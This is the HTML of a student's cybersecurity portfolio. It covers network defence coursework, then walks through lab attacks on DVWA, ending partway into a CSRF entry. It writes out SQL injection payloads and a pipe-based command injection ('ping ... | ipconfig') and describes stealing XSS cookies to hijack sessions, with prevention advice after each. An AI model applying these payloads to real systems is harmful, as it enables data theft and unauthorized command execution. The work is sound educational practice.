          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/4.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S7 2021</h4>
          <h4 class="subheading">My minor</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          
          <li class="timeline-inverted">
          <div class="timeline-image">
          <h4>The
          <br>Future
          </h4>
          </div>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="team">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About me</h2>
          <h3 class="section-subheading text-muted">Some additional links and information.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-sm-4">
          
          </div>
          <div class="col-sm-4">
          <div class="team-member">
          <img class="mx-auto rounded-circle" src="img/team/Pim.jpg" alt="">
          <h4>Pim Beekmans</h4>
          <p class="text-muted">Student</p>
          <ul class="list-inline social-buttons">
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-twitter"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="#">
          <i class="fab fa-facebook-f"></i>
          </a>
          </li>
          <li class="list-inline-item">
          <a href="https://www.linkedin.com/in/pim-beekmans/?originalSubdomain=nl">
          <i class="fab fa-linkedin-in"></i>
          </a>
          </li>
          </ul>
          </div>
          </div>
          <div class="col-sm-4">
          
          </div>
          <div class="row">
          <div class="col-lg-8 mx-auto text-center">
          <p class="large text-muted">This is me, thank you for reading, hopefully you've liked my portfolio on cyber security. For additional feedback feel free to send an email to <a href="/cdn-cgi/l/email-protection#09796064496b6c6c626468677a276d6c7f"><span class="__cf_email__" data-cfemail="e191888ca18384848a8c808f92cf858497">[email&#160;protected]</span></a>.</p>
          </div>
          </div>
          </div>
          </div>
          </section>
          
          <section class="py-5">
          <div class="container">
          <div class="row">
          
          </div>
          </div>
          </section>
          
          <section id="contact">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Contact Me</h2>
          <br>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <form id="contactForm" name="sentMessage" novalidate="novalidate">
          <div class="row">
          <div class="col-md-6">
          <div class="form-group">
          <input class="form-control" id="name" type="text" placeholder="Your Name *" required="required" data-validation-required-message="Please enter your name.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="email" type="email" placeholder="Your Email *" required="required" data-validation-required-message="Please enter your email address.">
          <p class="help-block text-danger"></p>
          </div>
          <div class="form-group">
          <input class="form-control" id="phone" type="tel" placeholder="Your Phone *" required="required" data-validation-required-message="Please enter your phone number.">
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="col-md-6">
          <div class="form-group">
          <textarea class="form-control" id="message" placeholder="Your Message *" required="required" data-validation-required-message="Please enter a message."></textarea>
          <p class="help-block text-danger"></p>
          </div>
          </div>
          <div class="clearfix"></div>
          <div class="col-lg-12 text-center">
          <div id="success"></div>
          <button id="sendMessageButton" class="btn btn-primary btn-xl text-uppercase" type="submit">Send Message</button>
          </div>
          </div>
          </form>
          </div>
          </div>
          </div>
          </section>
          
          <footer>
          <div class="container">
          <div class="row">
          <div class="col-md-4">
          <span class="copyright">Copyright &copy; Beekmans.dev 2019</span>
          </div>
          <div class="col-md-4">
          
          </div>
          <div class="col-md-4">
          <ul class="list-inline quicklinks">
          <li class="list-inline-item">
          <a href="#">Privacy Policy</a>
          </li>
          <li class="list-inline-item">
          <a href="#">Terms of Use</a>
          </li>
          </ul>
          </div>
          </div>
          </div>
          </footer>
          
          
          <div class="portfolio-modal modal fade" id="portfolioModal1" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Self Assessment</h2>
          <p class="item-intro text-muted">Week 1</p>
          <p>
          <ol>
          <li>What did you like / or find easy?</li>
          <li>What did you find difficult? At what point did it get too difficult for now?</li>
          <li>
          Then check the list of learning subjects for the basic knowledge assignment and
          possibilities and requirements for the project.
          <ul>
          <li>What subjects do you already know and what is unknown terrain for you?</li>
          </ul>
          </li>
          <li>What parts of the current semester would you like to give much attention?</li>
          <li>What do you want to achieve and learn in particular?</li>
          <li>Which study style and corresponding planning is most suitable for you?</li>
          <li>What would you like to do or achieve in the project? (subjects, type of project,
          domain to work in, learning goals, etc.)
          </li>
          </ol>
          <br>
          Answers:
          <br>
          <ol>
          <li>I like working with servers and playing with my network at home and virtual
          machines. I think I find basic networking the easiest.
          </li>
          <li>Advanced networking all knowledge that I know is self-taught so I think there is a
          lot I don’t know yet. I got stuck on virtual lans and ip routing at home what else
          I’ll find difficult is what I need to find out in the distant future.
          </li>
          <li>
          Subjects:
          <div class="container">
          <div class="row">
          <div class="col-sm-4">
          <ul>
          Used:
          <li>VMWare</li>
          <li>Linux</li>
          <li>IPv4</li>
          <li>NAT</li>
          <li>TCP/IP</li>
          <li>DNS</li>
          <li>HTTP</li>
          <li>FTP</li>
          <li>Firewalls</li>
          <li>HTTPS</li>
          <li>VPN</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Know about but never used:
          <li>VMWare ESX</li>
          <li>Wireshark</li>
          <li>ARP</li>
          <li>IP routing</li>
          <li>SMTP</li>
          <li>IDS</li>
          </ul>
          </div>
          <div class="col-sm-4">
          <ul>
          Never heard about it:
          <li>Seclab</li>
          <li>ICMP ping</li>
          <li>CIA and IT Risk analysis</li>
          </ul>
          </div>
          </div>
          </div>
          </li>
          <li>Advanced networking and the transition to Java.</li>
          <li>How to be a good Cyber security expert.</li>
          <li>Style 2, I’ll try to find out if this is the most suitable for me and maybe go to
          the style 3 courses on the days I get subjects I already know.
          </li>
          <li>I don’t really have a preference I want to learn as much as possible related to
          cyber security.
          </li>
          </ol>
          </p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Self assessment</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal2" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagram.png" alt="">
          <p>This network diagram shows 3 main VLAN's containing a employee environment for the
          employees to work on, a guest environment for the people visiting the company as guests
          and a DMZ for the servers and services to the outside world.</p>
          <ul class="list-inline">
          <li>Date: February 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal3" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Network diagram V2</p>
          <img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/NetworkDiagramV2.png" alt="">
          <p>This is the second version of my network diagram. I changed a few things to match
          Casper's feedback. The first thing I changed are the firewalls, I only needed to address
          the physical firewall and not the ones for every single interface. The last thing was I
          added the corresponding IP ranges and subnets to each VLAN.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Documentation</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal4" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Secure connections</p>
          <a href="../../img/portfolio/blue/sshAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sshAccess.png" alt=""></a>
          <p>Here you can see that I made a SSH connection to my Ubuntu webserver. I use Putty as my
          SSH terminal. SSH is encrypted using PGP (Pretty good privacy) which uses a public and a
          private key to communicate with each other. This is especially helpful because you don't
          need to transfer passwords to encrypt the connection. The sending client encrypts its
          message using the public key from the recipient and the recipient decrypts the message
          using its own private key. This works the same the other way around. I can use this
          technique to remotely manage my webservers without the need physical access.</p>
          <a href="../../img/portfolio/blue/vpnAccess.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/vpnAccess.png" alt=""></a>
          <p>Here you can see that I'm connected to a VPN. This VPN is OpenVPN and runs on the PfSense
          router. It gives me access to the subnets I gave it access to and with this I can
          remotely manage my whole network, with being actually physically connected to the
          network. The OpenVPN connection is encrypted be TLS (Transfer layer security) which is
          successor from SSL. TLS uses a handshake at the start of the connection where a key is
          shared between the 2 clients. This key will be used for the symmetric encryption of the
          messages. The authenticity of the connection is secured by a certificate and the public
          key of the webserver this prevents possible man in the middle attacks, where someone
          will pretend to be another website for example.</p>
          <a href="../../img/portfolio/blue/sslConnection.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/sslConnection.png" alt=""></a>
          <p>Here you can see the ssl certificate I created for the website that is running my
          portfolio. I created the script using certbot in Ubuntu and the CA is Let's encrypt
          authority x3. The website automatically forces all traffic to https, the website is
          still accessible by http but will redirect the user to https.</p>
          <ul class="list-inline">
          <li>Date: March 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Secure connections</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal5" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IDS/IPS</p>
          <P>I implemented Suricata as my IPS, I thought it would be the best option because they say
          it's more advanced and newer. Below you can see some prove of the implementation and
          some results I came across.</P>
          <a href="../../img/portfolio/blue/Suricata1.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata1.png" alt=""></a>
          <p>I configured the IPS to monitor the WAN and LAN interface for now but I'm planning to
          configure it to the Employee VLAN as well. This will protect the company for any
          potential threats from the inside.</p>
          <a href="../../img/portfolio/blue/Suricata2.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata2.png" alt=""></a>
          <p>I tested the IPS with a website called <a href="https://www.wicar.org/">Wicar</a>. On
          this website you can run malicious code and test you network without it being an actual
          threat or risk.</p>
          <a href="../../img/portfolio/blue/Suricata3.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Suricata3.png" alt=""></a>
          <p>I have used the Snort community rules and the Emerging threats rules these are both free
          to use and do a decent job of protecting the network with not too many false
          positives.</p>
          <a href="../../img/portfolio/blue/DDOSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/DDOSAlert.png" alt=""></a>
          <p>We encountered a real world scenario which actually turned out to work really well with
          an IPS. Bram tried to DDOS my website while it was running in my pfsense environment.
          The IPS immediately noticed this and blocked his IP. While the website was running
          outside the pfsense zone Bram could DDOS all he want without getting blocked.</p>
          <a href="../../img/portfolio/blue/BlockList.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BlockList.png" alt=""></a>
          <p>Here you can see Bram's IP in the Suricata blocklist.</p>
          <a href="../../img/portfolio/blue/Bram'sIP.jpg"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/Bram'sIP.jpg" alt=""></a>
          <p>This is a screenshot from Bram's computer with his IP he used for generating the
          alert.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: IDS/IPS</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal6" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
           <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">Information Security and Risk Analysis</p>
          <h3>CIA</h3>
          <h4>Confidentiality:</h4>
          <p>The company will hold confidential data from costumers, things like credit card
          information user accounts and databases for the costumer's websites.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Costumer data .... Leak</li>
          </ul>
          <h4>Integrity:</h4>
          <p>The costumers trust the company to secure their servers on their end and they trust the
          company that it won't sell any costumer data to 3rd parties.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Correct .... Tampering</li>
          </ul>
          <h4>Availability:</h4>
          <p>Because the costumers might use these websites for commercial use, it is at the utmost
          importance that the websites are fast, reliable and 24/7 reachable.</p>
          <br>
          <ul>
          <li>Attribute .... Threat</li>
          <li>Well timed .... Delay</li>
          <li>Continuity .... Downtime</li>
          </ul>
          <p>Click on this <a href="../../img/portfolio/Risk%20analysis.xlsx">link</a> to download the full
          risk analysis.</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Risk Analysis</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
